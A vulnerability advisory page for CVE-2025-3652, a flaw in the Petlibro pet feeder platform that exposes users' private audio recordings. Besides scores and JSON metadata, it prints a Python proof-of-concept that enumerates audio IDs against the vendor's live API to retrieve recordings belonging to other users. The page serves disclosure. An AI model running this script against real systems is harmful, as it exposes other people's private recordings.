Security Vulnerability Report
CVE-2025-3652 CVSS 5.3 MEDIUM

Published: 2026-01-04 00:15:44
Last Modified: 2026-02-03 17:40:57

Description

Petlibro Smart Pet Feeder Platform versions up to 1.7.31 contain an information disclosure vulnerability that allows unauthorized access to private audio recordings by exploiting sequential audio IDs and insecure assignment endpoints. Attackers can send requests to /device/deviceAudio/use with arbitrary audio IDs to assign recordings to any device, then retrieve audio URLs to access other users' private recordings.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:petlibro:petlibro:*:*:*:*:-:*:*:* - VULNERABLE
Petlibro Smart Pet Feeder Platform < 1.7.32

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# CVE-2025-3652 PoC - Petlibro Audio Information Disclosure
# Target: Petlibro Smart Pet Feeder Platform <= 1.7.31

TARGET_HOST = "https://api.petlibro.com"
ATTACKER_DEVICE_ID = "attacker_device_id_here"
TARGET_AUDIO_ID = 1  # Starting from sequential ID


def assign_audio_to_device(audio_id, device_id):
    """Assign arbitrary audio ID to attacker's device via vulnerable endpoint"""
    endpoint = f"{TARGET_HOST}/device/deviceAudio/use"
    payload = {"audioId": audio_id, "deviceId": device_id}
    response = requests.post(endpoint, json=payload)
    return response


def get_audio_url(device_id):
    """Retrieve audio URL after assignment"""
    endpoint = f"{TARGET_HOST}/device/deviceAudio/list"
    params = {"deviceId": device_id}
    response = requests.get(endpoint, params=params)
    if response.status_code == 200:
        data = response.json()
        return data.get("audioUrl")
    return None


def exploit():
    print("[*] Starting CVE-2025-3652 exploitation...")
    for audio_id in range(1, 100):  # Enumerate audio IDs
        print(f"[*] Trying audio ID: {audio_id}")
        assign_resp = assign_audio_to_device(audio_id, ATTACKER_DEVICE_ID)
        if assign_resp.status_code == 200:
            audio_url = get_audio_url(ATTACKER_DEVICE_ID)
            if audio_url:
                print(f"[!] Found accessible audio: {audio_url}")
                return audio_url
    print("[*] Exploitation complete")


if __name__ == "__main__":
    exploit()
```

References

- https://bobdahacker.com/blog/petlibro (Product)
- https://www.vulncheck.com/advisories/petlibro-smart-pet-feeder-platform-through-audio-information-disclosure-via-api-endpoint (Third Party Advisory)
Raw JSON Data

```json
{"cve": {"id": "CVE-2025-3652", "sourceIdentifier": "[email protected]", "published": "2026-01-04T00:15:43.950", "lastModified": "2026-02-03T17:40:56.770", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Petlibro Smart Pet Feeder Platform versions up to 1.7.31 contains an information disclosure vulnerability that allows unauthorized access to private audio recordings by exploiting sequential audio IDs and insecure assignment endpoints. Attackers can send requests to /device/deviceAudio/use with arbitrary audio IDs to assign recordings to any device, then retrieve audio URLs to access other users' private recordings."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-288"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:petlibro:petlibro:*:*:*:*:-:*:*:*", "versionEndIncluding": "1.7.31", "matchCriteriaId": "0B604E0A-05A3-46E0-8558-FF3F00F5EF0D"}]}]}], "references": [{"url": "https://bobdahacker.com/blog/petlibro", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/petlibro-smart-pet-feeder-platform-through-audio-information-disclosure-via-api-endpoint", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
```